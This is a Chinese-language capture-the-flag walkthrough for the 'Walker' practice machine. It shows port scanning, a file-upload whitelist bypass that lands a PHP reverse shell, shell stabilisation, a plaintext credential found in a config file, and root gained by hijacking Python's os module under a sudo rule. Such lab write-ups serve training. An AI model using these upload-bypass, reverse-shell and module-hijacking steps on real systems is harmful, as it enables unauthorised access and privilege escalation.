Walker

靶机说明

  • QQ群:660930334

一、信息收集

1、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap -sn 192.168.2.0/24                          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-18 16:29 CST
Nmap scan report for 192.168.2.1
Host is up (0.00075s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00037s latency).
MAC Address: 08:00:27:2C:69:A0 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.15
Host is up (0.00052s latency).
MAC Address: 08:00:27:0E:B2:03 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.13 seconds

靶机IP:192.168.2.15

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap --min-rate 10000 -p- 192.168.2.15                             
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-18 16:29 CST
Nmap scan report for 192.168.2.15
Host is up (0.00018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:0E:B2:03 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.66 seconds

开放端口:22、80

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.15 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-18 16:30 CST
Nmap scan report for 192.168.2.15
Host is up (0.00062s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: CyberSec Professional - Bootstrap 5 Resume/CV Template
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:0E:B2:03 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.98 seconds
  1. 22端口,ssh服务,用于远程登录
  2. 80端口,http服务

二、WEB渗透

1、路径信息泄露

访问80端口,发现是一份简历,同时Web-Walk字体与其他字体不一样,猜测可能是某个路径,尝试去访问

访问Web-Walk(Linux系统对大小写敏感,因此大小写都要进行尝试)

找到一个文件上传的功能

2、文件上传利用

经过测试,发现只允许上传jpg, png, gif, webp格式的图片,属于白名单检测
尝试修改文件头和文件MIME格式,发现成功上传,并泄露出文件上传后的路径/var/www/html/web-walk/tmp/rev.php

三、获取www-data权限

访问上传成功的文件/web-talk/tmp/rev.php,成功获取到shell

1
2
3
4
5
6
┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nc -lvnp 4444     
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.15] 33316
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

获取稳定的shell

1
2
3
4
5
6
7
8
script /dev/null -c bash
# 按下 Ctrl+Z 将其挂起
stty raw -echo; fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

四、权限提升

1、获取walk权限

web-walk/tmp/.config/binwalk/config/目录下,找到一个extract.conf文件

1
2
onf data@walker:/var/www/html/web-walk/tmp/.config/binwalk/config$ cat extract.conf
walk:walkwalkwalk

找到一组凭证walk:walkwalkwalk

切换到walk用户

1
2
3
4
www-data@walker:/home$ su walk
Password: 
walk@walker:/home$ id
uid=1000(walk) gid=1000(walk) groups=1000(walk)

2、获取root权限

查看sudo具有的权限

1
2
3
4
5
6
7
walk@walker:/home$ sudo -l
Matching Defaults entries for walk on walker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User walk may run the following commands on walker:
    (ALL) NOPASSWD: /usr/bin/python3 /home/walk/calc.py

发现/home/walk/calc.py文件可以不需要密码即可使用python3进行执行root权限

执行calc.py,发现是一道算术题,需要执行100次

1
2
3
4
5
walk@walker:~$ sudo /usr/bin/python3 /home/walk/calc.py
Solve 100 math questions. Get 80 correct to reveal the password!

six + three = 9
Correct! Total correct: 1/100

os劫持

写入恶意内容进行劫持

1
2
walk@walker:~$ echo "import os; os.system('/bin/bash')" > random.py
walk@walker:~$ echo "import os; os.system('/bin/bash')" > os.py

注:
将文件命名为 os.py是一种模块劫持(Module Hijacking) 尝试。当Python程序中 import os时,解释器会首先在当前目录下寻找名为 os.py的文件。如果找到,就会执行这个文件,而不是导入标准库中的 os模块。这意味着,如果一个正常的程序在包含此恶意 os.py的目录下运行,其导入操作会被劫持,从而无意中执行恶意代码。

获取root权限

1
2
3
walk@walker:~$ sudo /usr/bin/python3 /home/walk/calc.py
root@walker:/home/walk# id
uid=0(root) gid=0(root) groups=0(root)

五、获取FLAG

1
2
3
root@walker:/home/walk# cat /home/walk/user.txt /root/root.txt 
flag{walk-user-bububububu}
flag{walk-root-hahahahahaha}
Maze-sec
#文件上传 #python-os劫持
Walker
http://miao-sec.github.io/Maze-sec/Walker/
作者
Miao
发布于
2026年1月9日
许可协议
BY-MIAO